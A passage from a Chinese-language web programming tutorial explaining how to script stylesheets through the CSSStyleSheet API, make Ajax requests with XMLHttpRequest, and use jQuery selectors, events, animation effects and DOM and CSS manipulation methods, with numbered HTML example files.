}
脚本化样式表
CSSStyleSheet类型表示的是样式表。我们知道,引入CSS一共有3种方式,包括行间样式、内部样式和外部样式。其中,内部样式和外部样式分别通过<style><link>标签以样式表的形式引入,属于CSSStyleSheet类型。
样式表CSSStyleSheet是通过document.styleSheets集合来表示的,它会返回一组对象集合,这些对象代表了与文档关联的各个样式表。
CSSStyleSheet对象成员 说明
cssRules 返回样式表的规则集合
deleteRule(pos) 从样式表中移除一条规则
disabled 获取或设置样式表的禁用状态
href 返回链接样式表的href
insertRule(rule,pos) 插入一条新规则到样式表中
media 返回应用到样式表上的媒介限制集合
ownerNode 返回样式所定义的元素
title 返回title属性的值
type 返回type属性的值
获得样式表的基本信息
Chap3-54.html
<head>
<meta charset="UTF-8">
<title>chap3-54</title>
<style title="S1">
p{border: double medium black;background-color: lightgray}
#block1{color: white}
table{border: thin solid black;border-collapse: collapse;margin: 5px;float: left}
td{padding: 2px}
</style>
<link rel="stylesheet" title="L1" type="text/css" href="css/styles.css">
<style title="S2" media="screen AND (min-width:500px)" type="text/css">
#block2{color: yellow;font-style: italic}
</style>
</head>
<body>
<p id="block1">There are lots of different kinds of fruit</p>
<p id="block2">One of the most interesting aspects of fruit is the variety available in each country.</p>
<div id="placeholder"></div>
<script>
var placeholder=document.getElementById("placeholder");
var sheets=document.styleSheets;
for(var i=0;i<sheets.length;i++){
var newElem=document.createElement("table");
newElem.setAttribute("border","1");
addRow(newElem,"Index",i);
addRow(newElem,"href",sheets[i].href);
addRow(newElem,"title",sheets[i].title);
addRow(newElem,"type",sheets[i].type);
addRow(newElem,"ownerNode",sheets[i].ownerNode.tagName);
placeholder.appendChild(newElem);
}
function addRow(elem,header,value) {
elem.innerHTML+="<tr><td>"+header+":</td><td>"+value+"</td></tr>";
}
</script>
</body>
styles.css
a{
background-color: grey;
color: white;
}
span{
border:thin black solid;
padding: 10px;
}
禁用样式表
CSSStyleSheet.disabled属性可用来一次性启用和禁用某个样式表里的所有样式。
Chap3-55.html
<head> <style>p{border: medium double black;background-color: lightgray;height: 40px}</style>
<style media="screen AND (min-width:500px)" type="text/css">
#block1{color: yellow;border: thin solid black;background-color: lightgreen} </style>
</head>
<body>
<p id="block1">There are lots of different kinds of fruit</p>
<div><button id="pressme">Press Me</button> </div>
<script>
document.getElementById("pressme").onclick=function () {
document.styleSheets[0].disabled=!document.styleSheets[0].disabled;
}
</script>
</body>
CSSRuleList对象
CSSStyleSheet.cssRules属性会返回一个CSSRuleList对象,它允许你访问样式表里的各种样式。样式表里的每一种CSS样式都有一个CSSStyleRule对象代表。
CSSRuleList对象成员 说明
item(pos) 返回指定索引的CSS样式
length 返回样式表里的样式数量
CSSStyleRule对象成员 说明
cssText 获取或设置样式的文本(包括选择器)
parentStyleSheet 获取此样式所属的样式表
selectorText 获取或设置样式的选择器文本
style 获取一个代表具体样式属性的对象
Chap3-56.html
<head> <style> p{border: double medium black;background-color: lightgray}
#block1{color: white;border: thick solid black;background-color: gray}
table{border: thin solid black;border-collapse: collapse;margin: 5px;float: left}
td{padding: 2px} </style>
</head>
<body>
<p id="block1">There are lots of different kinds of fruit</p>
<p id="block2">One of the most interesting aspects of fruit is the variety available in each country.</p>
<div><button id="pressme">Press Me</button> </div>
<div id="placeholder"></div>
<script>
var placeholder=document.getElementById("placeholder");
processStyleSheet();
document.getElementById("pressme").onclick=function () {
document.styleSheets[0].cssRules.item(1).selectorText="#block2";
if(placeholder.hasChildNodes()){
var childCount=placeholder.childNodes.length;
for(var i=0;i<childCount;i++){
placeholder.removeChild(placeholder.firstChild);
}
}
processStyleSheet();
}
function processStyleSheet() {
var rulesList=document.styleSheets[0].cssRules;
for(var i=0;i<rulesList.length;i++){
var rule=rulesList.item(i);
var newElem=document.createElement("table");
newElem.setAttribute("border","1");
addRow(newElem,"parentStyleSheet",rule.parentStyleSheet.title);
addRow(newElem,"selectorText",rule.selectorText);
addRow(newElem,"cssText",rule.cssText);
placeholder.appendChild(newElem);
}
}
function addRow(elem,header,value) {
elem.innerHTML+="<tr><td>"+header+":</td><td>"+value+"</td></tr>";
}
</script>
</body>
脚本化HTTP
超文本传输协议(HyperText Transfer Protocol, HTTP)规定Web浏览器如何从Web服务器获取文档和向Web服务器提交表单内容,以及Web服务器如何响应这些请求和提交。
通常,HTTP并不在脚本的控制下,只是当用户单击链接、提交表单和输入URL时才发生。但是,用JavaScript操作HTTP是可行的,当用window.location属性或调用表单对象的submit()方法时,都会初始化HTTP请求。在这两种情况下,浏览器会加载新页面。
Ajax描述了一种主要使用脚本操纵HTTP的Web应用架构。Ajax应用的主要特点是使用脚本操纵HTTP和Web服务器进行数据交换,不会导致页面重载。
Web应用可以使用Ajax技术把用户的交互数据记录到服务器中;也可以开始只显示简单页面,之后按需加载额外的数据和页面组件来提升应用的启动时间。
Ajax起步
Ajax的关键在于XMLHttpRequest对象。
第一步是创建一个新的XMLHttpRequest对象:
var httpRequest=new XMLHttpRequest();
第二步是给XMLHttpRequest对象的readystatechange事件设置一个事件处理器。这个事件会在请求过程中被多次触发,向你提供事情的进展情况。可以读取XMLHttpRequest.readyState属性的值来确定当前处理的是哪一个。
数值 说明
UNSENT 0 已创建XMLHttpRequest对象
OPENED 1 已调用open方法
HEADERS_RECEIVED 2 已收到服务器响应的标头
LOADING 3 已收到服务器响应
DONE 4 响应完成或已失败,如请求成功,HTTP状态码为200
第三步是告诉XMLHTTPRequest对象你想要做什么,比如调用open方法请求打开文档:
httpRequest.open(“GET”,“chap3-58.html”);
第四步是调用send方法,向服务器发送请求:
httpRequest.send();
XMLHttpRequest.responseText属性可以用来获得服务器发送的数据,例如:
document.getElementById("results").innerHTML=httpRequest.responseText;
responseText属性会返回一个字符串,代表从服务器上取回的数据。
Chap3-61.html
<body>
<div>
<button>chap3-58.html</button>
<button>chap3-59.html</button>
<button>chap3-60.html</button>
</div>
<div id="results" style="border: dotted medium black">Press a button</div>
<script>
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
var httpRequest=new XMLHttpRequest();
httpRequest.onreadystatechange=function (e) {
if(e.target.readyState==XMLHttpRequest.DONE && e.target.status==200){
document.getElementById("results").innerHTML=e.target.responseText;
}
};
httpRequest.open("GET",e.target.innerHTML);
httpRequest.send();
}
}
</script>
</body>
使用Ajax事件
事件名称 说明
abort 在请求被中止时触发
error 在请求失败时触发
timeout 如果请求超时则触发
readystatechange 在请求生命周期的不同阶段触发
loadstart 在请求开始时触发
progress 触发以提示请求的进度
load 在请求成功完成时触发
loadend 在请求已完成时触发,无论成功还是失败
除了readystatechange之外,其他事件都定义于XMLHttpRequest规范的第二级。调度这些事件时,浏览器会对readystatechange事件使用常规的Event对象,对其他事件则使用ProgressEvent对象。
名称 说明
lengthComputable 如果能够计算数据流的总长度则返回true
loaded 返回当前已载入的数据量
total 返回可用的数据总量
Chap3-62.html
<div><button>chap3-57.html</button><button>chap3-58.html</button><button>chap3-59.html</button></div>
<table id="events" border="1"></table><div id="target">Press a button</div>
<script>
var tableElem=document.getElementById("events"),buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){buttons[i].onclick=handleButtonPress;}
var httpRequest;
function handleButtonPress(e) {
clearEventDetails();
httpRequest=new XMLHttpRequest();
httpRequest.onreadystatechange=handleResponse;
httpRequest.onerror=handleError;
httpRequest.onload=handleLoad;
httpRequest.onloadend=handleLoadEnd;
httpRequest.onloadstart=handleLoadStart;
httpRequest.onprogress=handleProgress;
httpRequest.open("GET",e.target.innerHTML);
httpRequest.send();
}
function handleResponse(e) {
displayEventDetails("readystate("+httpRequest.readyState+")");
if(httpRequest.readyState==4&&httpRequest.status==200){
document.getElementById("target").innerHTML=httpRequest.responseText;
}
}
function handleError(e) {displayEventDetails("error",e);}
function handleLoad(e) {displayEventDetails("load",e);}
function handleLoadEnd(e) {displayEventDetails("loadend",e);}
function handleLoadStart(e) {displayEventDetails("loadstart",e);}
function handleProgress(e) {displayEventDetails("progress",e);}
function clearEventDetails() { tableElem.innerHTML="<tr><th>Event</th><th>lengthComputable</th><th>loaded</th><th>total</th></tr>"
}
function displayEventDetails(eventName,e) {
if(e){ tableElem.innerHTML+="<tr><td>"+eventName+"</td><td>"+e.lengthComputable+"</td><td>"+e.loaded+"</td><td>"+e.total+"</td></tr>";
}else {
tableElem.innerHTML+="<tr><td>"+eventName+"</td><td>NA</td><td>NA</td><td>NA</td></tr>"
}
}
</script>
jQuery
jQuery是一个JavaScript库,jQuery极大地简化了 JavaScript编程,jQuery很容易学习。jQuery 库包含以下特性:
• HTML 元素选取和操作
• CSS 操作
• HTML 事件函数
• JavaScript 特效和动画
• HTML DOM 遍历和修改
• AJAX
共有两个版本的jQuery可供下载:一份是精简过的,另一份是未压缩的(供调试或阅读)。这两个版本都可从jQuery.com下载。
如需使用 jQuery,需要把它包含在希望使用的网页中。可以使用 HTML 的 <script> 标签引用它:
<script src="jquery.js"></script>
jQuery 语法是为 HTML 元素的选取编制的,可以对元素执行某些操作。基础语法是:
$(selector).action()
• 美元符号定义 jQuery
• 选择符(selector)"查询"和"查找" HTML 元素
• jQuery 的 action() 执行对元素的操作
$(this).hide() //隐藏当前元素
$("p").hide() //隐藏所有段落
$(".test").hide() //隐藏所有 class="test" 的所有元素
$("#test").hide() //隐藏所有 id="test" 的元素
CSS选择符
jQuery中有3种基本的选择符:
选择符 CSS jQuery 说明
标签名 P $('p') 取得文档中所有的段落
ID #some-id $('#some-id') 取得文档中ID为some-id的一个元素
.some-class $('.some-class') 取得文档中类为some-class的所有元素
当在jQuery中使用$(document).ready()时,位于其中的所有代码都会在DOM加载后立即执行。
Chap3-63.html
<head><script src="js/jquery-3.3.1.js"></script>
<style>.horizontal{float: left;list-style: none;margin: 10px}
.subLevel{background-color: lightgray}
ul{font-size: x-large}
</style></head>
<body><p><ul id="selected">
<li>Fruits<ul><li>apple</li><li>banana</li><li>orange</li><li>pear</li></ul></li>
<li>Vegetables<ul><li>cabbage</li><li>tomato</li><li>potato</li><li>lettuce</li></ul></li>
<li>Meat<ul><li>pork</li><li>beef</li><li>chicken</li><li>lamb</li></ul></li>
</ul></p>
<p><button id="horizontal-level">Horizontal CSS</button><button id="sub-level">Sub-level CSS</button></p>
<script>
$(document).ready(function () {
$("#horizontal-level").click(function () {
$('#selected>li').addClass('horizontal');
});
$("#sub-level").click(function () {
$("#selected li:not(.horizontal)").addClass("subLevel");
});
})
</script>
</body>
属性选择符
jQuery也支持属性选择符,CSS属性选择符详细内容参照第2章CSS。
例如:要选择带有alt属性的所有图像元素,可以使用以下代码:$("img[alt]")
要选择带有href属性且以mailto开头的锚元素,可以使用:$("a[href^=mailto:]")
要选择所有PDF文件的链接,可以使用:$("a[href$=.pdf]")
自定义选择符
除了各种CSS选择符之外,jQuery还添加了独有的完全不同的自定义选择符:
选择器 实例 说明
:first $("p:first") 第一个<p>元素
:last $("p:last") 最后一个<p>元素
:even $("tr:even") 所有偶数<tr>元素
:odd $("tr:odd") 所有奇数<tr>元素
:eq(index) $("ul li:eq(3)") 列表中的第四个元素(index从0开始)
:gt(no) $("ul li:gt(3)") 列出index大于3的元素
:lt(no) $("ul li:lt(3)") 列出index小于3的元素
:not(selector) $("input:not(:empty)") 所有不为空的input元素
:header $(":header") 所有标题元素<h1>-<h6>
:contains(text) $(":contains('W3School')") 包含指定字符串的所有元素
:empty $(":empty") 无子(元素)节点的所有元素
:hidden $("p:hidden") 所有隐藏的<p>元素
:visible $("table:visible") 所有可见的表格
Chap3-64.html
<head><script src="js/jquery-3.3.1.js"></script>
<style> tr{background-color: lightgray} .even{background-color: lightgreen}
.first{font-weight: bolder} .last{font-style: italic}
.eq0{color: red} .gt4{color: red} .contain{text-align: center}
</style></head>
<body>
<table width="300px">
<tr><td>Fruits</td><td>Color</td></tr><tr><td>apple</td><td>red</td></tr>
<tr><td>banana</td><td>yellow</td></tr><tr><td>pear</td><td>yellow</td></tr>
<tr><td>plum</td><td>purple</td></tr><tr><td colspan="2">My favorite fruits</td></tr>
</table>
<script>
$(document).ready(function () {
$("tr:even").addClass("even");
$("tr:first").addClass("first");
$("tr:last").addClass("last");
$("tr:eq(0)").addClass("eq0");
$("tr:gt(4)").addClass("gt4");
$("tr:contains('yellow')").addClass("contain");
});
</script>
</body>
在操作表单时,jQuery的自定义选择符也可以简化选择元素的任务:
选择器 实例 说明
:input $(":input") 所有<input>元素
:text $(":text") 所有type="text"<input>元素
:password $(":password") 所有type="password"<input>元素
:radio $(":radio") 所有type="radio"<input>元素
:checkbox $(":checkbox") 所有type="checkbox"<input>元素
:submit $(":submit") 所有type="submit"<input>元素
:reset $(":reset") 所有type="reset"<input>元素
:button $(":button") 所有type="button"<input>元素
:image $(":image") 所有type="image"<input>元素
:file $(":file") 所有type="file"<input>元素
:enabled $(":enabled") 所有激活的input元素
:disabled $(":disabled") 所有禁用的input元素
:selected $(":selected") 所有被选取的input元素
:checked $(":checked") 所有被选中的input元素
Chap3-65-html
<head><script src=“js/jquery-3.3.1.js”></script>
<style> .s1{display: inline-block;width: 80px;height:40px;font-size: x-large}
.s2{display: inline-block;width: 200px;height:40px;font-size: x-large}
</style></head>
<body>
<pre>
<span class=“s1”>用户名:</span><span class=“s2”><input type=“text”></span>
<span class=“s1”>密码:</span><span class=“s2”><input type=“password”></span>
<span class=“s1”>性别:</span><span class=“s2”><input type=“radio” name=“sex” checked>男 <input type=“radio” name=“sex”>女</span>
<button>加边框</button>
</pre>
<script>
$(document).ready(function () {
$(":text").css("background-color","lightgray");
$(":password").css("color","red");
$(":button").click(function () {
$(":checked").css("outline","dotted medium green");
});
});
</script>
</body>
事件
事件方法 描述
$(document).ready(function) 将函数绑定到文档的就绪事件(当文档完成加载时)
$(selector).click(function) 触发或将函数绑定到被选元素的点击事件
$(selector).dblclick(function) 触发或将函数绑定到被选元素的双击事件
$(selector).focus(function) 触发或将函数绑定到被选元素的获得焦点事件
$(selector).mouseover(function) 触发或将函数绑定到被选元素的鼠标悬停事件
$(selector).mouseleave(function) 触发或将函数绑定到被选元素的mouse leave事件
$(selector).change(function) 触发或将函数绑定到被选元素的change事件
$(selector).keydown(function) 触发或将函数绑定到被选元素的key down事件
$(selector).keyup(function) 触发或将函数绑定到被选元素的key up事件
Chap3-66.html
<head><script src="js/jquery-3.3.1.js"></script>
<style>.s1{display: inline-block;width: 80px;height:40px;font-size: x-large}
.s2{display: inline-block;width: 200px;height:40px;font-size: x-large}
.outline{outline: medium dotted green}</style></head>
<body>
<pre>
<span class="s1">用户名:</span><span class="s2"><input type="text"></span>
<span class="s1">密码:</span><span class="s2"><input type="password"></span>
<span class="s1">性别:</span><span class="s2"><input type="radio" name="sex" checked>男 <input type="radio" name="sex">女</span>
</pre>
<script>
$(document).ready(function () {
$(":text").keydown(function () {$(this).css("background-color","lightgreen");});
$(":text").keyup(function () {$(this).css("background-color","lightgray");});
$(":password").dblclick(function () {$(this).hide();});
$(":radio").mousemove(function () {$(this).addClass("outline");});
$(":radio").mouseleave(function () {$(this).removeClass("outline");});
});
</script>
效果
方法 描述
animate() 对被选元素应用“自定义”的动画
clearQueue() 对被选元素移除所有排队的函数(仍未运行的)
delay() 对被选元素的所有排队函数(仍未运行)设置延迟
dequeue() 运行被选元素的下一个排队函数
fadeIn() 逐渐改变被选元素的不透明度,从隐藏到可见
fadeOut() 逐渐改变被选元素的不透明度,从可见到隐藏
fadeTo() 把被选元素逐渐改变至给定的不透明度
hide() 隐藏被选的元素
queue() 显示被选元素的排队函数
show() 显示被选的元素
slideDown() 通过调整高度来滑动显示被选元素
slideToggle() 对被选元素进行滑动隐藏和滑动显示的切换
slideUp() 通过调整高度来滑动隐藏被选元素
stop() 停止在被选元素上运行动画
toggle() 对被选元素进行隐藏和显示的切换
• animate()方法执行CSS属性集的自定义动画。该方法通过CSS样式将元素从一个状态改变为另一个状态。CSS属性值是逐渐改变的,这样就可以创建动画效果。
语法:$(selector).animate(styles,speed,easing,callback)
参数 说明
styles 必需。规定产生动画效果的 CSS 样式和值。 可能的 CSS 样式值:backgroundPositionborderWidthborderBottomWidthborderLeftWidthorderRightWidthborderTopWidthborderSpacingmarginmarginBottommarginLeftmarginRightmarginTopoutlineWidthpaddingpaddingBottompaddingLeftpaddingRightpaddingTopheightwidthmaxHeightmaxWidthminHeightminWidthfontfontSizebottomleftrighttopletterSpacingwordSpacinglineHeighttextIndent
speed 可选。规定动画的速度。默认是normal。可能的值:毫秒(比如 1500)、slownormalfast
easing 可选。规定在不同的动画点中设置动画速度的easing函数。内置的 easing函数:swinglinear
callback 可选。animate函数执行完之后,要执行的函数。
注意:只有数字值可创建动画(比如margin:30px)。字符串值无法创建动画(比如background-color:red)。
• delay()方法对被选元素的所有排队函数(仍未运行)设置延迟。如果当前动画还没执行完,并不会立即停止,而是等当前动画执行完,然后延迟,再执行下一个动画。它常用在队列中的两个jQuery效果函数之间,从而在上一个动画效果执行后,延迟指定时间,然后再执行下一个动画。
语法:$(selector).delay(duration,[queueName])
参数 说明
duration 延时时间,单位:毫秒
queueName 队列名词,默认是Fx,动画队列。
• queue()方法显示或操作在匹配元素上执行的函数队列。队列是一个或多个等待运行的函数。queue()方法通常与dequeue()方法一起使用。
语法:$(selector).queue(queueName)
• dequeue()方法为匹配元素执行序列中的下一个函数。当调用.dequeue()时,会从序列中删除下一个函数,然后执行它。该函数反过来会(直接或间接地)引发对.dequeue()的调用,这样序列才能继续下去。
语法:$(selector).dequeue(queueName)
注意:当通过.queue()添加函数时,我们应当确保最终调用了.dequeue(),这样下一个排队的函数才能执行。
Chap3-68.html
<body>
<button id="start">开始动画</button><button id="stop">停止动画</button>
<div style="background-color: green;height: 100px;width: 100px;position: absolute"></div>
<script>
$(document).ready(function () {
var div=$("div");
$("#start").click(function () {
div.animate({height:"300px",opacity:"0.4"},"slow");
div.animate({width:"300px",opacity:"0.8"},"slow");
div.queue(function () {
div.css("background-color","red");
div.dequeue();
})
div.animate({height:"100px",opacity:"0.4"},"slow");
div.animate({width:"100px",opacity:"0.8"},"slow");
div.delay(1000).animate({width:"500px",opacity:"0.4"});
});
$("#stop").click(function () {
div.clearQueue();
});
});
</script>
</body>
• fadeIn()方法使用淡入效果来显示被选元素,假如该元素是隐藏的。
语法:$(selector).fadeIn(speed,callback)
参数 说明
speed 可选。规定元素从隐藏到可见的速度。默认为normal。可能的值:毫秒 (比如1500)、slownormalfast。在设置速度的情况下,元素从隐藏到可见的过程中,会逐渐地改变其透明度(这样会创造淡入效果)。
callback 可选。fadeIn函数执行完之后,要执行的函数。除非设置了speed参数,否则不能设置该参数。
• fadeOut()方法使用淡出效果来隐藏被选元素,假如该元素是显示的。
语法:$(selector).fadeOut(speed,callback)
• fadeTo()方法将被选元素的不透明度逐渐地改变为指定的值。
语法:$(selector).fadeTo(speed,opacity,callback)
参数 说明
opacity 必需。规定要淡入或淡出的透明度。必须是介于0.001.00之间的数字。
Chap3-68.html
<button id="fadeout">淡出</button><button id="fadein">淡入</button>
<button id="fadeto">改变透明度</button>
<div style="background-color: green;height: 100px;width: 100px;position: absolute"></div>
<script>
$(document).ready(function () {
var div=$("div");
$("#fadein").click(function () {
div.fadeIn(1000,function () {
alert("fadeIn()方法已完成!");
});
});
$("#fadeout").click(function () {
div.fadeOut(1000,function () {
alert("fadeOut()方法已完成!");
});
});
$("#fadeto").click(function () {
div.fadeTo(2000,0.4,function () {
alert("fadeTo()方法已完成!");
});
});
• hide()方法如果被选的元素已被显示,则隐藏该元素。
语法:$(selector).hide(speed,callback)
• show()方法如果被选元素已被隐藏,则显示这些元素。
语法:$(selector).show(speed,callback)
• slideDown()方法通过使用滑动效果,显示隐藏的被选元素。
语法:$(selector).slideDown(speed,callback)
• slideUp()方法通过使用滑动效果,隐藏被选元素,如果元素已显示出来的话。
语法:
$(selector).slideUp(speed,callback)
• slideToggle()方法通过使用滑动效果(高度变化)来切换元素的可见状态。如果被选元素是可见的,则隐藏这些元素,如果被选元素是隐藏的,则显示这些元素。
语法:$(selector).slideToggle(speed,callback)
Chap3-68.html
<button id="hide">隐藏</button><button id="show">显示</button><button id="slidedown">Slide Down</button> <button id="slideup">Slide Up</button><button id="slidetoggle">Slide Toggle</button>
<div style="background-color: green;height: 100px;width: 100px;position: absolute"></div>
$(document).ready(function () {
var div=$("div");
$("#hide").click(function () {
div.hide(1000);
});
$("#show").click(function () {
div.show(1000,function () {
div.css("background-color","blue");
});
});
$("#slidedown").click(function () {
div.slideDown(1000);
});
$("#slideup").click(function () {
div.slideUp(1000);
});
$("#slidetoggle").click(function () {
div.slideToggle(1000);
});
});
文档操作
方法 描述
addClass() 向匹配的元素添加指定的类名。
after() 在匹配的元素之后插入内容。
append() 向匹配元素集合中的每个元素结尾插入由参数指定的内容。
appendTo() 向目标结尾插入匹配元素集合中的每个元素。
attr() 设置或返回匹配元素的属性和值。
before() 在每个匹配的元素之前插入内容。
clone() 创建匹配元素集合的副本。
detach() 从DOM中移除匹配元素集合。
empty() 删除匹配的元素集合中所有的子节点。
hasClass() 检查匹配的元素是否拥有指定的类。
html() 设置或返回匹配的元素集合中的HTML内容。
insertAfter() 把匹配的元素插入到另一个指定的元素集合的后面。
insertBefore() 把匹配的元素插入到另一个指定的元素集合的前面。
prepend() 向匹配元素集合中的每个元素开头插入由参数指定的内容。
prependTo() 向目标开头插入匹配元素集合中的每个元素。
remove() 移除所有匹配的元素。
removeAttr() 从所有匹配的元素中移除指定的属性。
removeClass() 从所有匹配的元素中删除全部或者指定的类。
replaceAll() 用匹配的元素替换所有匹配到的元素。
replaceWith() 用新内容替换匹配的元素。
text() 设置或返回匹配元素的内容。
toggleClass() 从匹配的元素中添加或删除一个类。
unwrap() 移除并替换指定元素的父元素。
val() 设置或返回匹配元素的值。
wrap() 把匹配的元素用指定的内容或元素包裹起来。
wrapAll() 把所有匹配的元素用指定的内容或元素包裹起来。
wrapinner() 将每一个匹配的元素的子内容用指定的内容或元素包裹起来。
• addClass()方法向被选元素添加一个或多个类。该方法不会移除已存在的class属性,仅仅添加一个或多个class属性。
语法:$(selector).addClass(class)
• hasClass()方法检查被选元素是否包含指定的 class。
语法:$(selector).hasClass(class)
• removeClass()方法从被选元素移除一个或多个类。如果没有规定参数,则该方法将从被选元素中删除所有类。
语法:$(selector).removeClass(class)
• toggleClass()对设置或移除被选元素的一个或多个类进行切换。
语法:$(selector).toggleClass(class,switch)
参数 说明
switch 可选。布尔值。规定是否添加或移除class。
Chap3-69.html
<head><script src="js/jquery-3.3.1.js"></script>� <style>� .intro{font-size: x-large;color: blue} .note{background-color: yellow} .main{color:red}� </style>�</head>�<body>�<h1>This is a heading</h1><p>This is a paragraph.</p><p>This is another paragraph.</p>�<button id="btn1">向第一个 p 元素添加两个类</button><button id="btn2">改变第一个段落的类</button>�<button id="btn3">切换段落的 "main" 类</button>�<script>� $(document).ready(function(){� $("#btn1").click(function(){� $("p:first").addClass("intro note");� });� $("#btn2").click(function(){� $("p:first").removeClass("intro").addClass("main");� });� $("#btn3").click(function(){� $("p:first ").toggleClass("main");� });� });�</script>
• after()方法在被选元素后插入指定的内容。
语法:
• append()方法在被选元素的结尾(仍然在内部)插入指定内容。
语法:$(selector).append(content)
• appendTo()方法在被选元素的结尾(仍然在内部)插入指定内容,规定要插入的内容必须包含 HTML 标签。
语法:$(content).appendTo(selector)
• before()方法在被选元素前插入指定的内容。
语法:$(selector).before(content)
• prepend()方法在被选元素的开头(仍位于内部)插入指定内容。
语法:$(selector).prepend(content)
• prependTo()方法在被选元素的开头(仍位于内部)插入指定内容,规定要插入的内容必须包含HTML标签。
语法:$(content).prependTo(selector)
• insertBefore()方法在被选元素之前插入HTML标记或已有的元素,规定要插入的内容必须包含HTML标签。
语法:$(content).insertBefore(selector)
• insertAfter()方法在被选元素之后插入HTML标记或已有的元素,规定要插入的内容必须包含HTML标签。
语法:$(content).insertAfter(selector)
**Chap3-69.html **
<button id="btn4">after插入内容</button>
<button id="btn5">append插入内容</button>
<button id="btn6">appendTo插入内容</button>
<button id="btn7">before插入内容</button>
<button id="btn8">prepend插入内容</button>
<button id="btn9">prependTo插入内容</button>
<button id="btn10">insertBefore插入内容</button>
<button id="btn11">insertAfter插入内容</button>
<script>
$(document).ready(function(){
$("#btn4").click(function(){$("p:first").after("Hello World!"); });
$("#btn5").click(function(){$("p:eq(1)").append("Hello World!"); });
$("#btn6").click(function(){$("<b> Hello World!</b>").appendTo("p:eq(1)");});
$("#btn7").click(function(){$("p:first").before("Hello World!");});
$("#btn8").click(function(){$("p:eq(1)").prepend("Hello World!");});
$("#btn9").click(function(){$("<b> Hello World!</b>").prependTo("p:eq(1)");});
$("#btn10").click(function(){$("<b> 你好!</b>").insertBefore("p:eq(1)");});
$("#btn11").click(function(){$("<b> 你好!</b>").insertAfter("p:eq(1)");});
});
• attr()方法设置或返回被选元素的属性和值。当该方法用于返回属性值,则返回第一个匹配元素的值。当该方法用于设置属性值,则为匹配元素设置一个或多个属性/值对。
• 返回属性的值:$(selector).attr(attribute)
• 设置属性和值:$(selector).attr(attribute,value)
• 使用函数设置属性和值:$(selector).attr(attribute,function(index,currentvalue))
• 设置多个属性和值:$(selector).attr({attribute:value, attribute:value,...})
参数 描述
attribute 规定属性的名称。
value 规定属性的值。
function(index,currentvalue) 规定要返回属性值到集合的函数 : index接受集合中元素的index位置;currentvalue接受被选元素的当前属性值。
Chap3-69.html
<p><img src="pic/apple.jpg" alt="red apple" width="284" height="213"></p>
<button id="btn12">返回图片的宽度</button>
<button id="btn13">图像宽度减少50 px</button>
<button id="btn14">给图片设置宽度和高度属性</button>
<script>
$(document).ready(function(){
$("#btn12").click(function(){alert("图片宽度: " + $("img").attr("width"));});
$("#btn13").click(function(){
$("img").attr("width",function (n,v) {
return v-50;
})
});
$("#btn14").click(function(){$("img").attr({width:"150",height:"100"});});
});
• removeAttr()方法从被选元素移除一个或多个属性。
语法:$(selector).removeAttr(attribute)
• html()方法设置或返回被选元素的内容(innerHTML)。当该方法用于返回内容时,则返回第一个匹配元素的内容。当该方法用于设置内容时,则重写所有匹配元素的内容。
• 返回内容:$(selector).html()
• 设置内容:$(selector).html(content)
• 使用函数设置内容:$(selector).html(function(index,currentcontent))
• text()方法设置或返回被选元素的文本内容。当该方法用于返回内容时,则返回所有匹配元素的文本内容(会删除HTML标记)。当该方法用于设置内容时,则重写所有匹配元素的内容。
• 返回文本内容:$(selector).text()
• 设置文本内容:$(selector).text(content)
• 使用函数设置文本内容:$(selector).text(function(index,currentcontent))
Chap3-69.html
<p class="main note">这是<b>另一个</b>段落。</p>
<button id="btn15">删除所有 p 元素的 style 属性</button>
<button id="btn16">html()修改第四个段落的内容</button>
<button id="btn17">text()修改第四个段落的内容</button>
<script>
$(document).ready(function(){
$("#btn15").click(function(){$("p").removeAttr("class");});
$("#btn16").click(function(){
$("p").html(function(n){
if(n===3){return $(this).html()+"这个P元素的索引位置为: " + n;}
});
});
$("#btn17").click(function(){
$("p:eq(3)").text(function(n){return $(this).text();});
});
});
• val()方法返回或设置被选元素的value属性。当用于返回值时:该方法返回第一个匹配元素的 value 属性的值。当用于设置值时:该方法设置所有匹配元素的value属性的值。
• 返回value属性:$(selector).val()
• 设置value属性:$(selector).val(value)
• 通过函数设置value属性:$(selector).val(function(index,currentvalue))
• replaceWith() 和replaceAll()方法用指定的 HTML 内容或元素替换被选元素。差异在于语法:内容和选择器的位置,以及 replaceWith() 能够使用函数进行替换。
语法:
$(selector).replaceWith(content)
$(content).replaceAll(selector)
• wrap()方法把每个被选元素放置在指定的 HTML 内容或元素中。
语法:$(selector).wrap(wrappingElement,function(index))
参数 描述
wrappingElement 必需。规定包裹每个被选元素的HTML元素。可能的值: HTML元素、jQuery对象、DOM 元素
function(index) 可选。规定返回包裹元素的函数。index:返回集合中元素的index位置。
• unwrap()方法移除被选元素的父元素。
语法:$(selector).unwrap()
Chap3-69.html
<style> div{border: medium dotted black;width: 800px} </style>
<p>姓名: <input type="text" name="fname" value="Peter"></p>
<button id="btn18">返回第一个输入字段的值</button>
<button id="btn19">设置姓名的值</button>
<button id="btn20">替换每个P元素</button>
<button id="btn21">创建一个新的div来环绕每个p元素</button>
<button id="btn22">去掉 div 元素</button>
$(document).ready(function(){
$("#btn18").click(function(){$("p:eq(3)").text($("input:text").val());});
$("#btn19").click(function(){
$("input:text").val(function (n,c) {
return c+" Chen";
});
});
$("#btn20").click(function(){
$("p").replaceWith(function(n){
return "<h3>这个元素的下标是 " + n + ".</h3>";
});
});
$("#btn21").click(function(){$("p").wrap(document.createElement("div"));});
$("#btn22").click(function(){$("p").unwrap();});
CSS操作
css()方法为被选元素设置或返回一个或多个样式属性。
当用于返回属性:
• 该方法返回第一个匹配元素的指定CSS属性值。然而,简写的CSS属性(比如backgroundborder)不被完全支持,且当用于返回属性值时,在不同的浏览器中有不同的结果。
• 语法:$(selector).css(property)
当用于设置属性:
• 该方法为所有匹配元素设置指定CSS属性。
• 设置CSS属性和值:$(selector).css(property,value)
• 使用函数设置CSS属性和值:$(selector).css(property,function(index,currentvalue))
• 设置多个属性和值:$(selector).css({属性:value, 属性:value, ...})
Chap3-70.html
<body><p style="font-size: 30px;color: red">这是一个段落。</p>
<button id=“btn1”>返回P元素的CSS样式颜色值</button><button id=“btn2”>设置P元素的字体大小</button>
<button id="btn3">设置P元素的多个css属性</button>
<script>
$(document).ready(function(){
$("#btn1").click(function(){$("p").text($("p").css("color"));});
$("#btn2").click(function(){
$("p").css("font-size",function(i,v){
return Number(v.substr(0,v.length-2))+10;
});
});
$("#btn3").click(function(){
$("p").css({
"color":"white",
"background-color":"lightgray",
"font-family":"Arial",
"font-size":"50px",
"padding":"5px"
});
});
});
</script>
</body>
客户端存储
